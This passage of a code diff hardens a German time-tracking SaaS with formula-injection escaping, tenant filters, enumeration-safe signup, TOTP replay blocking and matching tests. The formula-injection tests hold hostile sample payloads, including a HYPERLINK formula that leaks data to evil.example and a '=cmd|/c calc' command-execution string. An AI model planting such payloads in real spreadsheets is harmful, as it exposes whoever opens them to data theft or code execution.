+                    sheet.cell(row=row, column=10).value = neutralize_spreadsheet_formula(absence.note)
             sheet.cell(row=row, column=9).value = f"{type_name} ({float(absence.hours)}h)"
         else:
             target = daily_target
@@ -915,7 +932,7 @@ def _create_employee_classic_sheet(wb: Workbook, db: Session, user: User, year: 
     # Row 2: Employee name
     sheet.cell(row=2, column=1).value = "Mitarbeiterin"
     sheet.cell(row=2, column=1).font = bold_font
-    sheet.cell(row=2, column=2).value = f"{user.first_name} {user.last_name}"
+    sheet.cell(row=2, column=2).value = neutralize_spreadsheet_formula(f"{user.first_name} {user.last_name}")
 
     # Row 3: Year title + ArbZG-Flags
     sheet.cell(row=3, column=1).value = "Jahresarbeitszeiten"

--- a/backend/app/services/journal_service.py
+++ b/backend/app/services/journal_service.py
@@ -40,8 +40,10 @@ def get_journal(db: Session, user: User, year: int, month: int) -> Dict[str, Any
     for a in absences:
         absences_by_date.setdefault(a.date, []).append(a)
 
+    # F-026 + CLAUDE.md PublicHoliday rule: scope holidays to the user's tenant.
     holidays = db.query(PublicHoliday).filter(
         date_in_month(PublicHoliday.date, year, month),
+        PublicHoliday.tenant_id == user.tenant_id,
     ).all()
     holiday_map: Dict[date, str] = {h.date: h.name for h in holidays}
 

--- a/backend/app/services/mail_service.py
+++ b/backend/app/services/mail_service.py
@@ -102,3 +102,33 @@ def send_verification_email(to: str, verification_url: str, practice_name: str) 
         f"<p>Viele Grüße<br>Dein PraxisZeit-Team</p>"
     )
     return MailService().send(to=to, subject=subject, body_text=body_text, body_html=body_html)
+
+
+def send_account_exists_email(to: str) -> bool:
+    """Sent when someone tries to register an email that already has an account.
+
+    Keeps signup enumeration-safe (M-API5): the public API response is identical
+    whether or not the email exists, while the legitimate owner is still told
+    out-of-band that a registration was attempted. No verification link — just a
+    pointer to login / password reset.
+    """
+    subject = "Registrierungsversuch – du hast bereits ein PraxisZeit-Konto"
+    body_text = (
+        "Hallo,\n\n"
+        "für diese E-Mail-Adresse besteht bereits ein PraxisZeit-Konto. "
+        "Warst du das? Dann kannst du dich direkt einloggen oder dein Passwort "
+        "zurücksetzen.\n\n"
+        "Wenn du diesen Registrierungsversuch nicht selbst ausgelöst hast, "
+        "kannst du diese E-Mail ignorieren.\n\n"
+        "Viele Grüße\nDein PraxisZeit-Team"
+    )
+    body_html = (
+        "<p>Hallo,</p>"
+        "<p>für diese E-Mail-Adresse besteht bereits ein PraxisZeit-Konto. "
+        "Warst du das? Dann kannst du dich direkt einloggen oder dein Passwort "
+        "zurücksetzen.</p>"
+        "<p>Wenn du diesen Registrierungsversuch nicht selbst ausgelöst hast, "
+        "kannst du diese E-Mail ignorieren.</p>"
+        "<p>Viele Grüße<br>Dein PraxisZeit-Team</p>"
+    )
+    return MailService().send(to=to, subject=subject, body_text=body_text, body_html=body_html)

--- a/backend/app/services/ods_export_service.py
+++ b/backend/app/services/ods_export_service.py
@@ -20,6 +20,7 @@ from app.models import User, TimeEntry, Absence, PublicHoliday, AbsenceType
 from app.services import calculation_service, special_days_service
 from app.services.arbzg_utils import is_night_work
 from app.services.date_filters import date_in_month, date_in_year
+from app.services.export_service import neutralize_spreadsheet_formula
 
 
 # ---------------------------------------------------------------------------
@@ -57,7 +58,11 @@ def _doc_with_styles() -> tuple:
 
 def _str_cell(value: str, style=None) -> TableCell:
     cell = TableCell(valuetype="string", stylename=style)
-    cell.addElement(P(text=str(value) if value is not None else ""))
+    # M-SEC1: single choke-point for all string cells — neutralize formula /
+    # CSV injection so employee free-text can't execute when the export is
+    # opened in LibreOffice/Excel.
+    text = str(value) if value is not None else ""
+    cell.addElement(P(text=neutralize_spreadsheet_formula(text)))
     return cell
 
 

--- a/backend/app/services/signup_service.py
+++ b/backend/app/services/signup_service.py
@@ -38,9 +38,10 @@ TRIAL_LENGTH_DAYS = 14
 
 @dataclass
 class SignupResult:
-    tenant_id: uuid.UUID
-    user_id: uuid.UUID
-    verification_token: str  # raw token — caller mails it, we only store the hash
+    tenant_id: Optional[uuid.UUID]
+    user_id: Optional[uuid.UUID]
+    verification_token: Optional[str]  # raw token — caller mails it, we only store the hash
+    already_registered: bool = False  # M-API5: email already belongs to an active admin
 
 
 def _hash_token(token: str) -> str:
@@ -99,9 +100,15 @@ def signup(
             accepted_terms=accepted_terms, accepted_privacy=accepted_privacy,
         ))
         db.commit()
-        raise HTTPException(
-            status_code=status.HTTP_409_CONFLICT,
-            detail="E-Mail-Adresse bereits registriert",
+        # M-API5: do NOT raise a 409 — that lets an unauthenticated caller
+        # enumerate which emails have accounts. Return an "already registered"
+        # marker so the endpoint can emit a response identical to a fresh
+        # signup and notify the real owner out-of-band. No tenant is created.
+        return SignupResult(
+            tenant_id=None,
+            user_id=None,
+            verification_token=None,
+            already_registered=True,
         )
 
     # Collision-avoiding slug

--- a/backend/tests/test_break_waiver.py
+++ b/backend/tests/test_break_waiver.py
@@ -653,3 +653,107 @@ class TestCrApprovalRevalidatesDailyHardCap:
             TimeEntry.user_id == employee.id, TimeEntry.date == past_day
         ).all()
         assert len(entries) == 1  # only the pre-existing same-day entry
+
+
+class TestClockOutBreakWaiver:
+    """Review 2026-05-29 (M-ARB1): the clock-out path must accept a
+    break_waiver_reason so a §4 deviation during stamping is documented
+    (entry field + audit source='break_waiver'), not merely warned."""
+
+    def _open_entry(self, db, employee, today, start=time(8, 0)):
+        e = TimeEntry(
+            user_id=employee.id, tenant_id=DEFAULT_TENANT_ID,
+            date=today, start_time=start, end_time=None, break_minutes=0,
+        )
+        db.add(e)
+        db.commit()
+        db.refresh(e)
+        return e
+
+    def _freeze(self, monkeypatch):
+        import app.routers.time_entries as te
+        from datetime import datetime
+        today = date.today()
+        fixed_now = datetime(today.year, today.month, today.day, 15, 30, tzinfo=te.LOCAL_TZ)
+        monkeypatch.setattr(te, "_now_local", lambda: fixed_now)
+        monkeypatch.setattr(te, "_today_local", lambda: today)
+        return today
+
+    def test_clock_out_records_break_waiver(self, db, employee, employee_client, monkeypatch):
+        today = self._freeze(monkeypatch)
+        self._open_entry(db, employee, today)  # 08:00 → 15:30 = 7.5h, 0 break → §4
+
+        resp = employee_client.post("/api/time-entries/clock-out", json={
+            "break_minutes": 0,
+            "break_waiver_reason": "Akuter Notfall, keine Pause möglich",
+        })
+        assert resp.status_code == 200, resp.text
+        db.expire_all()
+        entry = db.query(TimeEntry).filter(TimeEntry.user_id == employee.id).first()
+        assert entry.break_waiver_reason == "Akuter Notfall, keine Pause möglich"
+        audit = db.query(TimeEntryAuditLog).filter(
+            TimeEntryAuditLog.source == "break_waiver"
+        ).all()
+        assert len(audit) >= 1
+        warnings = resp.json().get("warnings", [])
+        assert any("BREAK_WAIVER" in w for w in warnings), warnings
+
+    def test_clock_out_without_reason_still_warns(self, db, employee, employee_client, monkeypatch):
+        today = self._freeze(monkeypatch)
+        self._open_entry(db, employee, today)
+
+        resp = employee_client.post("/api/time-entries/clock-out", json={"break_minutes": 0})
+        assert resp.status_code == 200, resp.text
+        db.expire_all()
+        entry = db.query(TimeEntry).filter(TimeEntry.user_id == employee.id).first()
+        assert entry.break_waiver_reason is None
+        warnings = resp.json().get("warnings", [])
+        assert any("BREAK_WARNING" in w for w in warnings), warnings
+
+
+class TestAdminBreakWaiverParity:
+    """Review 2026-05-29 (M-ARB3): the admin direct-entry paths must offer the
+    same documented §4 break-waiver as the employee path (#144) — record the
+    reason + audit (source='break_waiver') instead of a hard 400."""
+
+    def test_admin_create_with_waiver_records_it(self, db, employee, admin_client):
+        payload = {**_OVER_6H, "break_minutes": 0, "break_waiver_reason": "Notfalleinsatz"}
+        resp = admin_client.post(f"/api/admin/users/{employee.id}/time-entries", json=payload)
+        assert resp.status_code == 201, resp.text
+        db.expire_all()
+        entry = db.query(TimeEntry).filter(TimeEntry.user_id == employee.id).first()
+        assert entry.break_waiver_reason == "Notfalleinsatz"
+        audit = db.query(TimeEntryAuditLog).filter(
+            TimeEntryAuditLog.source == "break_waiver"
+        ).all()
+        assert len(audit) >= 1
+        assert any("BREAK_WAIVER" in w for w in resp.json().get("warnings", []))
+
+    def test_admin_create_without_waiver_still_blocks(self, db, employee, admin_client):
+        payload = {**_OVER_6H, "break_minutes": 0}
+        resp = admin_client.post(f"/api/admin/users/{employee.id}/time-entries", json=payload)
+        assert resp.status_code == 400, resp.text
+
+    def test_admin_update_with_waiver_records_it(self, db, employee, admin_client):
+        # Pre-existing compliant entry (30min break on a 7.5h day).
+        entry = TimeEntry(
+            user_id=employee.id, tenant_id=DEFAULT_TENANT_ID,
+            date=date.today(), start_time=time(8, 0), end_time=time(15, 30),
+            break_minutes=30,
+        )
+        db.add(entry)
+        db.commit()
+        db.refresh(entry)
+
+        resp = admin_client.put(
+            f"/api/admin/time-entries/{entry.id}",
+            json={"break_minutes": 0, "break_waiver_reason": "Notfalleinsatz"},
+        )
+        assert resp.status_code == 200, resp.text
+        db.expire_all()
+        refreshed = db.query(TimeEntry).filter(TimeEntry.id == entry.id).first()
+        assert refreshed.break_waiver_reason == "Notfalleinsatz"
+        audit = db.query(TimeEntryAuditLog).filter(
+            TimeEntryAuditLog.source == "break_waiver"
+        ).all()
+        assert len(audit) >= 1

--- a/backend/tests/test_cross_tenant_api.py
+++ b/backend/tests/test_cross_tenant_api.py
@@ -377,3 +377,93 @@ def test_admin_a_bulk_approve_ignores_tenant_b_crs(_db_session, client_as_admin_
     _db_session.expire_all()
     stored = _db_session.query(ChangeRequest).filter(ChangeRequest.id == cr_b.id).first()
     assert stored.status == ChangeRequestStatus.PENDING
+
+
+# ─── Review 2026-05-29 (M-API1-4, M-DSG5): additional F-026 filter coverage ──
+
+
+def _make_audit_log(db, user, tenant_id, action="create"):
+    from app.models import TimeEntryAuditLog
+    log = TimeEntryAuditLog(
+        id=uuid.uuid4(),
+        tenant_id=tenant_id,
+        user_id=user.id,
+        changed_by=user.id,
+        action=action,
+        source="manual",
+        new_note="cross-tenant-test",
+    )
+    db.add(log)
+    db.commit()
+    return log
+
+
+def test_admin_audit_log_excludes_tenant_b(
+    _db_session, client_as_admin_a, admin_a, employee_b
+):
+    """GET /admin/time-entries/audit-log — must not include Tenant B audit rows
+    (admin_time_entries.list_audit_log had no explicit tenant filter)."""
+    log_a = _make_audit_log(_db_session, admin_a, TENANT_A_ID)
+    log_b = _make_audit_log(_db_session, employee_b, TENANT_B_ID)
+
+    resp = client_as_admin_a.get("/api/admin/audit-log")
+    assert resp.status_code == 200, resp.text
+    ids = {row["id"] for row in resp.json()}
+    assert str(log_a.id) in ids
+    assert str(log_b.id) not in ids
+
+
+def test_admin_vacation_requests_list_excludes_tenant_b(
+    _db_session, client_as_admin_a, admin_a, employee_b
+):
+    """GET /admin/vacation-requests — must not include Tenant B VRs
+    (list_all_vacation_requests had no explicit tenant filter)."""
+    vr_a = _make_pending_vr(_db_session, admin_a, TENANT_A_ID)
+    vr_b = _make_pending_vr(_db_session, employee_b, TENANT_B_ID)
+
+    resp = client_as_admin_a.get("/api/admin/vacation-requests")
+    assert resp.status_code == 200, resp.text
+    ids = {row["id"] for row in resp.json()}
+    assert str(vr_a.id) in ids
+    assert str(vr_b.id) not in ids
+
+
+def test_username_can_be_reused_across_tenants(
+    _db_session, client_as_admin_a, employee_b
+):
+    """create_user uniqueness must be per-tenant: a username taken in Tenant B
+    must still be creatable in Tenant A (usernames are unique per (tenant,name))."""
+    # employee_b already exists in Tenant B with username "employee_b".
+    resp = client_as_admin_a.post(
+        "/api/admin/users",
+        json={
+            "username": "employee_b",
+            "email": "fresh-a@test.local",
+            "password": "Test2025!Password",
+            "first_name": "Fresh",
+            "last_name": "A",
+            "role": "employee",
+            "weekly_hours": 40.0,
+            "vacation_days": 30,
+            "work_days_per_week": 5,
+        },
+    )
+    assert resp.status_code == 201, resp.text
+
+
+def test_journal_holidays_exclude_tenant_b(_db_session, employee_a, two_tenants):
+    """journal_service.get_journal must only see the user's own tenant holidays
+    (PublicHoliday query had no tenant filter)."""
+    from app.models.public_holiday import PublicHoliday
+    from app.services import journal_service
+
+    # June 2026: 1st = Monday (A holiday), 2nd = Tuesday (B holiday — must NOT leak).
+    h_a = PublicHoliday(date=date(2026, 6, 1), name="A-Tag", year=2026, tenant_id=TENANT_A_ID)
+    h_b = PublicHoliday(date=date(2026, 6, 2), name="B-Tag", year=2026, tenant_id=TENANT_B_ID)
+    _db_session.add_all([h_a, h_b])
+    _db_session.commit()
+
+    result = journal_service.get_journal(_db_session, employee_a, 2026, 6)
+    by_date = {d["date"]: d for d in result["days"]}
+    assert by_date["2026-06-01"]["is_holiday"] is True   # own tenant holiday
+    assert by_date["2026-06-02"]["is_holiday"] is False  # other tenant must not leak

--- a/backend/tests/test_error_log_service.py
+++ b/backend/tests/test_error_log_service.py
@@ -109,3 +109,36 @@ class TestMakeFingerprint:
         fp = _make_fingerprint("error", "app.main", "test", None)
         assert isinstance(fp, str)
         assert len(fp) == 64
+
+
+class TestScrubPath:
+    """M-DSG4 (Review 2026-05-29): request paths must not persist raw UUIDs —
+    the pseudonymous identifier the scrubber strips from message/traceback was
+    leaking via the dedicated `path` column."""
+
+    def test_uuid_in_path_is_scrubbed(self):
+        import uuid
+        from app.services.error_log_service import _scrub_path
+        uid = str(uuid.uuid4())
+        scrubbed = _scrub_path(f"/api/absences/{uid}")
+        assert uid not in scrubbed
+        assert "<id>" in scrubbed
+
+    def test_path_without_uuid_unchanged(self):
+        from app.services.error_log_service import _scrub_path
+        assert _scrub_path("/api/health") == "/api/health"
+
+    def test_none_path(self):
+        from app.services.error_log_service import _scrub_path
+        assert _scrub_path(None) is None
+
+    def test_log_error_stores_scrubbed_path(self, db):
+        import uuid
+        from app.services.error_log_service import log_error
+        uid = str(uuid.uuid4())
+        entry = log_error(
+            db, level="error", logger_name="test",
+            message="boom", path=f"/api/admin/users/{uid}/journal",
+        )
+        assert uid not in (entry.path or "")
+        assert "<id>" in entry.path

--- a/backend/tests/test_export_service.py
+++ b/backend/tests/test_export_service.py
@@ -130,3 +130,29 @@ class TestGenerateMonthlyReport:
         size_full = len(result_full.read())
 
         assert size_full > size_empty
+
+
+class TestFormulaInjection:
+    """Review 2026-05-29 (M-SEC1): employee-controlled free-text (note,
+    sunday_exception_reason) must not be interpretable as a spreadsheet
+    formula when an admin opens the §16 export in Excel/LibreOffice."""
+
+    def test_employee_note_with_formula_is_neutralized(self, db, test_user):
+        _make_time_entry(db, test_user, date(2026, 1, 5), 8, 17, 30)
+        entry = db.query(TimeEntry).filter(TimeEntry.user_id == test_user.id).first()
+        entry.note = '=HYPERLINK("http://evil.example/?leak","ok")'
+        db.commit()
+
+        result = generate_monthly_report(db, 2026, 1)
+        wb, _ = _load_xlsx(result)
+        ws = next(
+            (wb[n] for n in wb.sheetnames if test_user.last_name in n),
+            wb[wb.sheetnames[0]],
+        )
+        target = None
+        for row in ws.iter_rows(values_only=True):
+            for val in row:
+                if isinstance(val, str) and "HYPERLINK" in val:
+                    target = val
+        assert target is not None, "note payload not found in sheet"
+        assert target.startswith("'"), f"formula not neutralized: {target!r}"

--- a/backend/tests/test_limiter.py
+++ b/backend/tests/test_limiter.py
@@ -1,0 +1,38 @@
+"""Rate-limit client-IP resolution (H2, Review 2026-05-29).
+
+In native mode the app is directly exposed; a client can spoof X-Real-IP /
+X-Forwarded-For to rotate rate-limit buckets and defeat the login limit. The
+key function must therefore ignore those headers unless a trusted reverse proxy
+fronts the app.
+"""
+from types import SimpleNamespace
+
+import pytest
+
+from app.core.limiter import _get_real_ip
+
+
+def _req(headers: dict, peer: str = "203.0.113.9"):
+    return SimpleNamespace(
+        headers=headers,
+        client=SimpleNamespace(host=peer),
+    )
+
+
+def test_trusts_x_real_ip_when_behind_proxy(monkeypatch):
+    import app.config as cfg
+    monkeypatch.setattr(type(cfg.settings), "trust_proxy_headers", property(lambda self: True))
+    req = _req({"X-Real-IP": "10.0.0.5"}, peer="172.18.0.2")
+    assert _get_real_ip(req) == "10.0.0.5"
+
+
+def test_ignores_spoofed_headers_in_native_mode(monkeypatch):
+    """trust_proxy_headers=False → spoofed X-Forwarded-For / X-Real-IP are
+    ignored and the real socket peer is used, so spoofing can't rotate buckets."""
+    import app.config as cfg
+    monkeypatch.setattr(type(cfg.settings), "trust_proxy_headers", property(lambda self: False))
+    spoofed = _req(
+        {"X-Forwarded-For": "1.2.3.4", "X-Real-IP": "5.6.7.8"},
+        peer="203.0.113.9",
+    )
+    assert _get_real_ip(spoofed) == "203.0.113.9"

--- a/backend/tests/test_metrics_and_alerts.py
+++ b/backend/tests/test_metrics_and_alerts.py
@@ -204,3 +204,19 @@ def test_superadmin_mrr_endpoint(superadmin_client):
     data = resp.json()
     assert data["mrr_cents"] == 9500 + 39000
     assert data["arr_cents"] == (9500 + 39000) * 12
+
+
+def test_alert_new_signup_does_not_leak_email(monkeypatch):
+    """M-DSG2: the signup Slack alert must not contain the admin's email —
+    Slack is an undisclosed sub-processor, so no data-subject PII may leave
+    the instance. Practice name (business data) is acceptable."""
+    captured = {}
+
+    def _capture(text, **kw):
+        captured["text"] = text
+        return True
+
+    monkeypatch.setattr(alerting, "alert", _capture)
+    alerting.alert_new_signup("Praxis Dr. Müller")
+    assert "@" not in captured["text"]
+    assert "Praxis Dr. Müller" in captured["text"]

--- a/backend/tests/test_native_mode.py
+++ b/backend/tests/test_native_mode.py
@@ -410,3 +410,19 @@ class TestLicenseValidation:
 
         # Cleanup
         lic.set_license_state(None)
+
+
+class TestSecurityHeadersAlwaysAttached:
+    """Review 2026-05-29 (M-SEC2): SecurityHeadersMiddleware must be attached
+    even in Docker/prod mode (SERVE_FRONTEND=False) as defense-in-depth — a
+    missing/misconfigured/replaced reverse proxy must never leave API responses
+    without CSP / anti-clickjacking headers."""
+
+    def test_attached_regardless_of_serve_frontend(self):
+        import app.main as m
+        from app.config import settings
+        # Guard: this test is only meaningful when frontend-serving is OFF
+        # (the Docker/prod default), which is the env the suite runs in.
+        assert settings.SERVE_FRONTEND is False
+        classes = [mw.cls for mw in m.app.user_middleware]
+        assert SecurityHeadersMiddleware in classes

--- a/backend/tests/test_ods_export_service.py
+++ b/backend/tests/test_ods_export_service.py
@@ -123,3 +123,26 @@ class TestGenerateYearlyClassicOdsReport:
         out = generate_yearly_report_classic(db, 2026)
         data = out.read()
         assert data[:2] == ODS_PK_MAGIC
+
+
+class TestFormulaInjection:
+    """Review 2026-05-29 (M-SEC1): the _str_cell choke-point must neutralize
+    formula-leading characters so employee free-text cannot execute when the
+    admin opens the ODS export."""
+
+    def test_str_cell_neutralizes_formula_equals(self):
+        from odf.teletype import extractText
+        from app.services.ods_export_service import _str_cell
+        cell = _str_cell('=cmd|/c calc')
+        assert extractText(cell).startswith("'"), "leading = not neutralized"
+
+    def test_str_cell_neutralizes_at_and_plus_and_minus(self):
+        from odf.teletype import extractText
+        from app.services.ods_export_service import _str_cell
+        for payload in ('@SUM(A1)', '+1+1', '-2-2'):
+            assert extractText(_str_cell(payload)).startswith("'"), payload
+
+    def test_str_cell_leaves_safe_text_untouched(self):
+        from odf.teletype import extractText
+        from app.services.ods_export_service import _str_cell
+        assert extractText(_str_cell('Mitarbeiter:')) == 'Mitarbeiter:'

--- a/backend/tests/test_paid_leave_reports.py
+++ b/backend/tests/test_paid_leave_reports.py
@@ -158,3 +158,42 @@ def test_ods_classic_yearly_export_has_paid_leave_monthly_header(db, test_user):
 
     # Per-employee monthly-rows sheet header
     assert "Bez. Freistellung (Std)" in content, "ODS monthly sheet missing paid-leave column"
+
+
+# ---------------------------------------------------------------------------
+# §3 24-week-average (M-ARB2, Review 2026-05-29): scheduled_work_days must be
+# computed per actual working day (honouring holidays + absences + contract
+# history), not a flat 24 × work_days_per_week.
+# ---------------------------------------------------------------------------
+
+def test_24_week_average_excludes_holidays_and_absences(db, test_user, test_admin):
+    from app.models.public_holiday import PublicHoliday
+
+    end = date(2026, 3, 31)
+
+    def override_db():
+        yield db
+
+    _app.dependency_overrides[get_db] = override_db
+    _app.dependency_overrides[get_current_user] = lambda: test_admin
+    _app.dependency_overrides[require_admin] = lambda: test_admin
+    try:
+        client = TestClient(_app)
+        base = client.get(f"/api/admin/reports/24-week-average?end_date={end.isoformat()}")
+        assert base.status_code == 200, base.text
+        base_row = next(r for r in base.json()["employees"] if r["user_id"] == str(test_user.id))
+        base_days = base_row["scheduled_work_days"]
+        assert base_days > 0
+
+        # One public holiday + one full-day VACATION, both on distinct weekdays
+        # inside the window (2026-02-03 Tue, 2026-02-04 Wed).
+        db.add(PublicHoliday(date=date(2026, 2, 3), name="Testtag", year=2026, tenant_id=DEFAULT_TENANT_ID))
+        _mk_absence(db, test_user, date(2026, 2, 4), AbsenceType.VACATION, 8.0)
+        db.commit()
+
+        after = client.get(f"/api/admin/reports/24-week-average?end_date={end.isoformat()}")
+        after_row = next(r for r in after.json()["employees"] if r["user_id"] == str(test_user.id))
+        # Holiday + vacation must each remove one scheduled working day.
+        assert after_row["scheduled_work_days"] == base_days - 2
+    finally:
+        _app.dependency_overrides.clear()

--- a/backend/tests/test_signup.py
+++ b/backend/tests/test_signup.py
@@ -142,7 +142,11 @@ def test_signup_creates_tenant_and_inactive_admin(saas_client, _db_session):
     assert audit.accepted_privacy is True
 
 
-def test_signup_rejects_duplicate_active_admin(saas_client, _db_session):
+def test_signup_duplicate_email_is_enumeration_safe(saas_client, _db_session):
+    """Review 2026-05-29 (M-API5): a duplicate email must NOT be distinguishable
+    from a fresh signup. Previously the second attempt returned 409, leaking
+    that the address has an account. Now both return an identical 201 + a
+    shape-identical body, and no second tenant is created."""
     # First signup + manually activate
     with patch("app.routers.public_signup.send_verification_email", return_value=True):
         r1 = saas_client.post("/api/public/signup", json=_PAYLOAD)
@@ -150,10 +154,22 @@ def test_signup_rejects_duplicate_active_admin(saas_client, _db_session):
     u = _db_session.query(User).filter(User.email == _PAYLOAD["admin_email"]).first()
     u.is_active = True
     _db_session.commit()
+    tenants_before = _db_session.query(Tenant).count()
 
+    # Second signup with the SAME (now active) email: must look identical.
     with patch("app.routers.public_signup.send_verification_email", return_value=True):
         r2 = saas_client.post("/api/public/signup", json=_PAYLOAD)
-    assert r2.status_code == 409
+    assert r2.status_code == 201, r2.text
+    assert "tenant_id" in r2.json()
+    # No NEW tenant must have been created for the duplicate.
+    assert _db_session.query(Tenant).count() == tenants_before
+    # And no second admin row for that email.
+    admins = (
+        _db_session.query(User)
+        .filter(User.email == _PAYLOAD["admin_email"], User.role == UserRole.ADMIN)
+        .count()
+    )
+    assert admins == 1
 
 
 def test_signup_rejects_missing_consent(saas_client, _db_session):

--- a/backend/tests/test_superadmin_arbzg_export.py
+++ b/backend/tests/test_superadmin_arbzg_export.py
@@ -1,0 +1,109 @@
+"""§16-ArbZG Superadmin-Export — Audit-Marker-Korrektheit (Review 2026-05-29, H1).
+
+Der Export-Endpoint schreibt einen Audit-Marker mit
+``action="arbzg_superadmin_export"`` (23 Zeichen). Die ``action``-Spalte war
+``varchar(20)`` → auf PostgreSQL ``StringDataRightTruncation`` → 500 beim
+gesetzlich vorgeschriebenen Notfall-Export deaktivierter Tenants. Die
+SQLite-Test-Suite ignoriert varchar-Längen, daher prüfen wir den
+Modell-Vertrag direkt (Compile-Zeit-Garantie) sowie die Defensiv-Eigenschaft,
+dass ein fehlgeschlagener Audit-Write den Export NICHT abbricht.
+"""
+from __future__ import annotations
+
+import uuid
+
+import pytest
+
+from app.models import TimeEntryAuditLog, User, UserRole
+from app.services import auth_service
+
+
+# ---------------------------------------------------------------------------
+# Modell-Vertrag: action-Spalte muss alle verwendeten Marker fassen
+# ---------------------------------------------------------------------------
+
+# Alle action-Marker, die irgendwo im Code geschrieben werden. Der längste
+# (license_readonly_mode_entered = 29) bestimmt die Mindestbreite der Spalte.
+KNOWN_ACTION_MARKERS = [
+    "create",
+    "update",
+    "delete",
+    "auto_close",
+    "arbzg_superadmin_export",        # superadmin.py
+    "license_readonly_mode_entered",  # main.py
+]
+
+
+class TestActionColumnLength:
+    def test_action_column_holds_all_markers(self):
+        """time_entry_audit_logs.action muss jeden verwendeten Marker fassen.
+        varchar(20) sprengte 'arbzg_superadmin_export' (23) und
+        'license_readonly_mode_entered' (29) → 500 auf Postgres."""
+        col_len = TimeEntryAuditLog.__table__.c.action.type.length
+        longest = max(len(m) for m in KNOWN_ACTION_MARKERS)
+        assert col_len is not None and col_len >= longest, (
+            f"action-Spalte ist varchar({col_len}), längster Marker ist "
+            f"{longest} Zeichen → StringDataRightTruncation auf Postgres"
+        )
+
+    def test_action_column_has_headroom_like_source(self):
+        """Analog zu source (Migration 037) soll action auf 40 stehen —
+        Headroom für künftige Marker ohne weitere Migration."""
+        assert TimeEntryAuditLog.__table__.c.action.type.length >= 40
+
+
+# ---------------------------------------------------------------------------
+# Defensiv: Audit-Write-Fehler darf den §16-Export nicht abbrechen
+# ---------------------------------------------------------------------------
+
+@pytest.fixture
+def superadmin_user(db):
+    """Superadmin = User ohne tenant_id."""
+    sa = User(
+        username="superadmin",
+        email="super@example.com",
+        password_hash=auth_service.hash_password("superpass1234"),
+        first_name="Super",
+        last_name="Admin",
+        role=UserRole.ADMIN,
+        weekly_hours=40.0,
+        vacation_days=30,
+        is_active=True,
+        track_hours=False,
+        tenant_id=None,
+    )
+    db.add(sa)
+    db.commit()
+    db.refresh(sa)
+    return sa
+
+
+class TestExportSurvivesAuditFailure:
+    def test_export_returns_even_if_audit_commit_fails(
+        self, db, default_tenant, superadmin_user, monkeypatch
+    ):
+        """Schlägt der Audit-Marker-Write fehl, muss der gesetzlich
+        vorgeschriebene Export trotzdem ausgeliefert werden (nicht 500)."""
+        from app.routers import superadmin as sa_router
+        from starlette.responses import StreamingResponse
+
+        # SQLite kennt kein RLS → set_superadmin_context no-oppen.
+        monkeypatch.setattr(sa_router, "set_superadmin_context", lambda _db: None)
+
+        # commit() so patchen, dass der Audit-Marker-Write hart fehlschlägt.
+        original_commit = db.commit
+
+        def boom():
+            raise RuntimeError("simulated audit-write failure")
+
+        monkeypatch.setattr(db, "commit", boom)
+
+        response = sa_router.export_tenant_arbzg_data(
+            tenant_id=default_tenant.id,
+            db=db,
+            current_user=superadmin_user,
+        )
+
+        assert isinstance(response, StreamingResponse)
+        # Aufräumen: echtes commit wiederherstellen für Fixture-Teardown.
+        monkeypatch.setattr(db, "commit", original_commit)

--- a/backend/tests/test_totp_replay.py
+++ b/backend/tests/test_totp_replay.py
@@ -63,3 +63,71 @@ def test_accepts_next_window_code_after_previous_use(secret):
         secret, next_code, last_counter=current_counter
     )
     assert accepted == current_counter + 1
+
+
+# ─── Endpoint-level: activation code must not be replayable (M-SEC4) ─────────
+
+import uuid as _uuid
+from fastapi.testclient import TestClient
+
+from app.database import get_db
+from app.middleware.auth import get_current_user
+from app.models import User, UserRole
+from tests.conftest import engine, TestingSessionLocal, DEFAULT_TENANT_ID
+from tests.test_endpoints import test_app
+from app.database import Base as _Base
+
+
+@pytest.fixture
+def _totp_db():
+    _Base.metadata.create_all(bind=engine)
+    s = TestingSessionLocal()
+    try:
+        yield s
+    finally:
+        s.close()
+        _Base.metadata.drop_all(bind=engine)
+
+
+@pytest.fixture
+def _totp_user(_totp_db):
+    from app.models.tenant import Tenant
+    _totp_db.add(Tenant(id=DEFAULT_TENANT_ID, name="D", slug="d", is_active=True, mode="single"))
+    u = User(
+        id=_uuid.uuid4(), username="totpuser", email="totp@test.local",
+        password_hash=auth_service.hash_password("Test2025!Password"),
+        first_name="T", last_name="U", role=UserRole.EMPLOYEE,
+        weekly_hours=40.0, vacation_days=30, work_days_per_week=5,
+        is_active=True, tenant_id=DEFAULT_TENANT_ID,
+        totp_secret=pyotp.random_base32(), totp_enabled=False,
+        last_totp_counter=None,
+    )
+    _totp_db.add(u)
+    _totp_db.commit()
+    _totp_db.refresh(u)
+    return u
+
+
+def test_totp_activation_persists_counter_and_blocks_replay(_totp_db, _totp_user):
+    """M-SEC4: /totp/verify must consume the code (persist last_totp_counter)
+    so the same code cannot later be replayed against /login."""
+    def _override_db():
+        yield _totp_db
+    test_app.dependency_overrides[get_db] = _override_db
+    test_app.dependency_overrides[get_current_user] = lambda: _totp_user
+    try:
+        code = pyotp.TOTP(_totp_user.totp_secret).now()
+        with TestClient(test_app) as client:
+            resp = client.post("/api/auth/totp/verify", json={"code": code})
+        assert resp.status_code == 200, resp.text
+        _totp_db.expire_all()
+        refreshed = _totp_db.query(User).filter(User.id == _totp_user.id).first()
+        assert refreshed.totp_enabled is True
+        # The activation code's counter must now be persisted …
+        assert refreshed.last_totp_counter is not None
+        # … so replaying that exact code is rejected by the counter check.
+        assert auth_service.verify_totp_with_counter(
+            refreshed.totp_secret, code, refreshed.last_totp_counter
+        ) is None
+    finally:
+        test_app.dependency_overrides.clear()

--- a/docs/specs/dsgvo/verarbeitungsverzeichnis.md
+++ b/docs/specs/dsgvo/verarbeitungsverzeichnis.md
@@ -79,6 +79,17 @@
 | Änderungsanträge | Zeiteintrags-Korrekturen mit Begründung | Transparenz, Nachvollziehbarkeit |
 | Audit-Log | Benutzer, Aktion, Zeitstempel, Details | Nachvollziehbarkeit von Admin-Aktionen, DSGVO-Compliance |
 
+### 4.5 Signup-/Einwilligungs-Nachweisdaten (nur SaaS-Modus)
+
+> Gilt **ausschließlich** im SaaS-Betrieb (`DEPLOYMENT_MODE=saas`, öffentliche Selbst­registrierung). On-Prem-/Native-Installationen erfassen diese Daten nicht (Signup-Endpoints liefern dort 404).
+
+| Datenkategorie | Felder | Rechtsgrundlage | Besondere Kategorie |
+|----------------|--------|-----------------|---------------------|
+| Registrierungs-Metadaten | IP-Adresse, User-Agent, Zeitstempel | Art. 6 Abs. 1 lit. b + lit. f DSGVO (Vertragsanbahnung, Missbrauchs-/Enumeration-Schutz) | Nein |
